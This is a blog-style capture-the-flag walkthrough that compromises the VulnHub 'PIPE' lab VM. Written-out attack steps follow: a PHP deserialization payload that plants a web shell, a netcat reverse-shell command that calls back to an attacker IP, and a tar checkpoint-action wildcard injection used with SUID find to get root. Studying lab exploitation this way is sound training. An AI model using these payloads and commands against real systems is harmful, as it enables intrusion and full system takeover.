Hello friends today we are
going to solve another CTF challenge “PIPE” of the vulnhub labs design by Mr.
Sagi. The level of this challenge is not so tough and its difficulty level is
labelled as medium. Solving this lab will give you a good experience of
penetration testing.
You can download it from
here: https://www.vulnhub.com/entry/devrandom-pipe,124/
Penetrating Methodologies:
Network Scanning (Nmap,Netdiscover)
Abusing HTTP service (Burp Suite)
Let’s Begin!!
Start with netdiscover
command to identify target IP in the local network, in my network 192.168.1.104
is my target IP, you will get yours.
netdiscover
Further let’s enumerate open ports and protocols information
of the target’s network with help of nmap following command:
nmap -p- -A 192.168.1.104
--open
And from here we get open ports 22, 80, 111, 54073
Now we will open target IP in browser as port 80 is active.
Here the website reflects off unauthorized message with a login page. On login
window it written “the site says: index.php” which we will be using later on.
Now using burpsuite we are going
to capture the cookies for login page by setting manual proxy of Firefox
browser. It has intercepted data for login page. Here we will change HTTP-GET
method into HTTP-POST.
As shown in the below image
replace GET from POST/index.php and then forward the intercepted request.
Ok! To above step leads us to website which shows a PIPE
picture and a link below it to get Show artist info.
As we cannot see anything else on this web page so we opened
the page source code. It shows an accessible directory scriptz/php.js in its
script content.
Now open target IP with /scriptz
in browser, and you will notice some file or scripts are present here. Download
both files for further enumeration.
So first we open php.js file here we found it is serializing
some data and after that we open log.php.bak which works with the js
file for serialization.
Then I search in Google and found Deserialization vulnerabilities
in JS
Now again returning to our original web page, and click on
the link given below of the Pipe image and capture cookies that request in
burp.
Select the parameter and send it for decoding in smart
decoder, in the image below red highlighted text is decoded and result is shown
in below window the code which is given in bottom window need to be altered so
that we can upload our malicious code.
Now modify the parm with the following code for remote code
execution and then forward the request.
O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:60:"
'; system($_GET['cmd']); echo '
Check your shell.php file is uploaded in that accessible
directory.
Now we have uploaded shell it’s time to open it see what it
gives us. As we have executed the code for cmd, we will type cmd in URL as
well.
cmd=id
It will dump the id of current user i.e. www-data.
Now let’s try to spwan tty shell of the victim’s machine
with help of netcat payload: nc 10.0.0.1 1234 -e /bin/bash 192.168.1.107 1234
Then start netcat listener and then execute the payload to
spawn tty shell of victim’s machine.
nc -lvp 1234
As you can observe we have successfully compromised target
machine and run the following command for gaining root access.
python -c 'import pty; pty.spawn("/bin/sh")'
Then we check for any cronjobs running on the system via cat
command we can see a couple of cron jobs running which interest us. In
/etc/crontab the script /usr/bin/compress.sh which is world readable now follow
the below steps
cat /etc/crontab
cat /usr/bin/compress.sh
cd /home/rene/backup
ls
echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh
test.sh"
echo "" > --checkpoint=1
ls -al /usr/bin/find
touch raj
find raj -exec "/bin/sh" \;
Yuppie!! We got the root access.
At last open the flag.txt file and we have our flag.
Mission accomplished!
0 comments:
Post a Comment